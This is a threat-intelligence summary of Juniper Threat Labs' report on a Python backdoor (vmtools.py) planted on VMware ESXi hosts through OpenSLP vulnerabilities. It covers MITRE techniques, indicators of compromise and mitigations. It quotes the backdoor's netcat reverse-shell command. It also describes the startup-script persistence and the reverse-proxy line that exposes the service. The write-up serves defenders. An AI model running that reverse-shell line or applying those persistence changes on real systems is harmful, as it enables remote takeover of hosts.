Juniper Threat Labs uncovered a custom Python backdoor implanted on a VMware ESXi host, persisting by editing startup and proxy configuration and exposing a local webserver that can run commands or establish a reverse shell. The attackers also wired a reverse proxy to allow external access to the malicious service, using a Python-based server named vmtools.py and four modified host/system files to survive reboots. #OpenSLP #CVE-2019-5544 #CVE-2020-3992 #VMwareESXi #JuniperThreatLabs
Keypoints
- Backdoor implanted on a VMware ESXi virtualization host, linked to OpenSLP vulnerabilities CVE-2019-5544 and CVE-2020-3992.
- Persistence achieved by modifying four system files stored across RAM and disk, injected at or around startup paths.
- Python-based backdoor (vmtools.py) begins with a VMware-inspired header and runs a local webserver on 127.0.0.1:8008 to accept password-protected commands or a reverse shell.
- Attack supports two modes: local command execution and a reverse shell to the attacker’s host/port.
- External access is enabled by altering the ESXi reverse proxy configuration to expose the malicious service beyond the host (endpoints.conf).
- Mitigation steps include applying patches, restricting access, and verifying the four modified files for unauthorized changes.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The attacker gained access via ESXi OpenSLP vulnerabilities; “ongoing in-the-wild attacks based on two vulnerabilities in the ESXi’s OpenSLP service: CVE-2019-5544 and CVE-2020-3992.”
- [T1059.006] Python – The Python backdoor runs a Python-based webserver that can execute remote commands or initiate a reverse shell; “The Python script launches a simple webserver that accepts password-protected POST requests and can be used in two ways: it can run arbitrary remote commands and display the results as a webpage, or it can launch a reverse shell to the host and port of the attacker’s choice.”
- [T1059.004] Unix Shell – The backdoor uses /bin/sh to spawn a reverse shell when requested; “cmd = ‘mkfifo /tmp/tmpy_8th_nb; cat /tmp/tmpy_8th_nb | /bin/sh -i 2>&1 | nc %s %s > /tmp/tmpy_8th_nb’ % (host, port)”
- [T1547.001] Boot or Logon Initialization Scripts – Persistence via startup script modification; “The first 7 lines prepend, in a convoluted fashion, a single line of code to /bin/hostd-probe.sh, a system file that is executed automatically when the system boots.”
- [T1090] Proxy – External access modification via a reverse proxy; “The attackers appended the following line to endpoints.conf, allowing external access to the malicious webserver: </ local 8008 allow allow>.”
- [T1036] Masquerading – File naming/location chosen to raise little suspicion; “The name of the file and its location, /store/packages/vmtools.py, was chosen to raise little suspicion on a virtualization host.”
Indicators of Compromise
- [File] Boot/startup persistence – /etc/rc.local.d/local.sh, /bin/hostd-probe.sh, and 2 more files (and 1 more hashed item, redacted)
- [File] Python backdoor script – /store/packages/vmtools.py
- [File] Proxy/configuration – /etc/vmware/rhttpproxy/endpoints.conf
- [Network] Local binding for backdoor webserver – 127.0.0.1:8008
- [Network] OpenSLP default port – 427 (default for OpenSLP service)
- [Network] External exposure line in endpoints.conf – “/ local 8008 allow allow”
- [Vulnerability] CVEs exploited – CVE-2019-5544, CVE-2020-3992
Read more: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers